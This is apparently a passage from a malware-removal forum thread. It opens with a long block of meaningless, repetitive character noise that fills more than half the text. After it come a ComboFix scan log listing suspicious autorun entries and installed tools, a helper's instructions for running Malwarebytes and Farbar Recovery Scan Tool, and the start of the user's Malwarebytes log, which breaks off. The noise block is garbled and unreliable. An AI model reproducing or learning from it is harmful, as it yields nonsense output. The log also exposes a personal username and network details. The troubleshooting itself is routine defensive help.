JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&JzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O JXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-dX12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k07rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7SH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH%\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@.((((((((((((((((((((((((( Files Created from 2014-07-24 to 2014-08-24 )))))))))))))))))))))))))))))))..2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Rita\AppData\Local\temp2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Guest\AppData\Local\temp2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Default\AppData\Local\temp2014-08-23 20:54 . 2014-08-23 21:01 -------- d-----w- C:\FRST2014-08-23 20:30 . 2014-08-23 21:21 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys2014-08-23 20:30 . 2014-08-23 20:30 -------- d-----w- c:\program files\Malwarebytes Anti-Malware2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys2014-08-23 20:16 . 2014-08-24 19:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT2014-08-23 15:02 . 2014-08-23 15:05 -------- d-----w- c:\programdata\Spybot - Search & Destroy2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG20142014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 22:19 . 2014-08-22 17:27 -------- d-----w- c:\program files\Glary Utilities 52014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a4952014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 20:51 . 2014-08-12 20:51 -------- d-----w- c:\programdata\IrfuqApivh2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll...(((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))).2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys..((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))..*Note* empty entries & legit default entries are not shown REGEDIT4.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]"IrfuqApivh"="c:\programdata\IrfuqApivh\IrfuqApivh.dat" [2014-08-19 252020]"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]"Spybot-S&D Cleaning"="c:\windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe" [2014-06-24 4566952].[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752].[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]"EnableLUA"= 0 (0x0)"EnableUIADesktopToggle"= 0 (0x0)"HideFastUserSwitching"= 0 (0x0).[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]"UseDefaultTile"= 0 (0x0).[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]BootExecute REG_MULTI_SZ autocheck autochk * \0BootDefrag.exe\0sasnative32.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]@="".[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]@="".S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]..[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12HPService REG_MULTI_SZ HPSLPSVChpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvcLocalServiceAndNoImpersonation REG_MULTI_SZ FontCache.Contents of the 'Scheduled Tasks' folder.2014-08-24 c:\windows\Tasks\GlaryInitialize 5.job- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05].2014-08-24 c:\windows\Tasks\RtlNICDiagVistaStart.job- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]..------- Supplementary Scan -------.uStart Page = hxxp://www.google.com/uInternet Settings,ProxyOverride = *.local;<local>TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3..**************************************************************************.catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.netRootkit scan 2014-08-24 15:40Windows 6.0.6002 Service Pack 2 NTFS.scanning hidden processes ... .scanning hidden autostart entries ... .scanning hidden files ... .scan completed successfullyhidden files: 0.**************************************************************************.--------------------- LOCKED REGISTRY KEYS ---------------------.[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984).------------------------ Other Running Processes ------------------------.c:\windows\system32\Ati2evxx.exec:\windows\system32\Ati2evxx.exec:\program files\Dell\DellDock\DockLogin.exec:\windows\system32\WLANExt.exec:\program files\Common Files\Adobe\ARM\1.0\armsvc.exec:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exec:\program files\AVG\AVG10\avgfws.exec:\program files\AVG\AVG10\avgwdsvc.exec:\program files\Bonjour\mDNSResponder.exec:\windows\dwrcs\DWRCS.EXEc:\windows\system32\lxblcoms.exec:\windows\system32\msiexec.exec:\program files\HTC\Internet Pass-Through\PassThruSvr.exec:\program files\Sony\PMB\PMBDeviceInfoProvider.exec:\program files\NETGEAR\WNA1100\WifiSvc.exec:\windows\system32\WUDFHost.exec:\program files\AVG\AVG10\avgnsx.exec:\program files\Dell\DellDock\DellDock.exec:\program files\Glary Utilities 5\Integrator.exec:\windows\RtHDVCpl.exec:\windows\System32\rundll32.exec:\program files\ActivIdentity\ActivClient\acsagent.exec:\program files\HP\Digital Imaging\bin\hpqtra08.exec:\program files\NETGEAR\WNA1100\WNA1100.exec:\program files\Microsoft Office\Office12\ONENOTEM.EXEc:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXEc:\windows\ehome\ehmsas.exec:\windows\system32\rundll32.exec:\program files\iPod\bin\iPodService.exec:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exec:\program files\HP\Digital Imaging\bin\hpqSTE08.exec:\program files\HP\Digital Imaging\bin\hpqbam08.exec:\program files\HP\Digital Imaging\bin\hpqgpc01.exec:\program files\Common Files\Apple\Internet Services\APSDaemon.exec:\\?\c:\windows\system32\wbem\WMIADAP.EXEc:\program files\Windows Media Player\wmpnetwk.exec:\windows\system32\rundll32.exec:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exec:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe.**************************************************************************.Completion time: 2014-08-24 15:45:51 - machine was rebootedComboFix-quarantined-files.txt 2014-08-24 19:45ComboFix2.txt 2014-08-23 20:16ComboFix3.txt 2014-08-23 18:22.Pre-Run: 238,198,915,072 bytes freePost-Run: 238,199,603,200 bytes free.- - End Of File - - 836BEC6E629D99F479DEE501CB2CA8455C616939100B85E558DA92B899A0FC36 Link to post Share on other sites More sharing options...
Naathim Posted August 24, 2014 ID:870721 Share Posted August 24, 2014 Good so far. Scan with Malwarebytes' Anti-MalwarePlease download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.First of all select update.Once updated, click the Settings tab, in the left panel choose Detctions & protection and tick Scan for rootkits.Click the Scan tab, choose Threat Scan is checked and click Scan Now.If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.Upon completion of the scan (or after the reboot), click the History tab.Click Application Logs and double-click the Scan Log.At the bottom click Export and choose Text file.Save the file to your desktop and include its content in your next reply. Scan with Farbar Recovery Scan ToolPlease re-run Farbar Recovery Scan Tool.Right-click on icon and select Run as Administrator to start the tool.> XP users click run after receipt of Windows Security Warning - Open File.> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.Make sure that Addition option is checked.Press Scan button and wait.The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.Please include their content in your next reply. Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871049 Share Posted August 25, 2014 I was able to run MBAM and FRST without having to go into safe mode. So, that's progress at least. Still getting a lot of automatic web page generation, though. Here are the requested logs: MBAM Malwarebytes Anti-Malwarewww.malwarebytes.org Scan Date: 8/25/2014Scan Time: 8:28:24 AMLogfile: MBAM.txtAdministrator: Yes Version: 2.00.2.1012Malware Database: v2014.08.25.02Rootkit Database: v2014.08.21.01License: FreeMalware Protection: DisabledMalicious Website Protection: DisabledSelf-protection: Disabled OS: Windows Vista Service Pack 2CPU: x86File System: NTFSUser: savas.kyriakidis Scan Type: Threat ScanResult: CompletedObjects Scanned: 355293Time Elapsed: 27 min, 27 sec Memory: EnabledStartup: EnabledFilesystem: EnabledArchives: EnabledRootkits: EnabledHeuristics: EnabledPUP: EnabledPUM: Enabled Processes: 0(No malicious items detected) Modules: 0(No malicious items detected) Registry Keys: 4PUP.Optional.FrostwireTB.A, 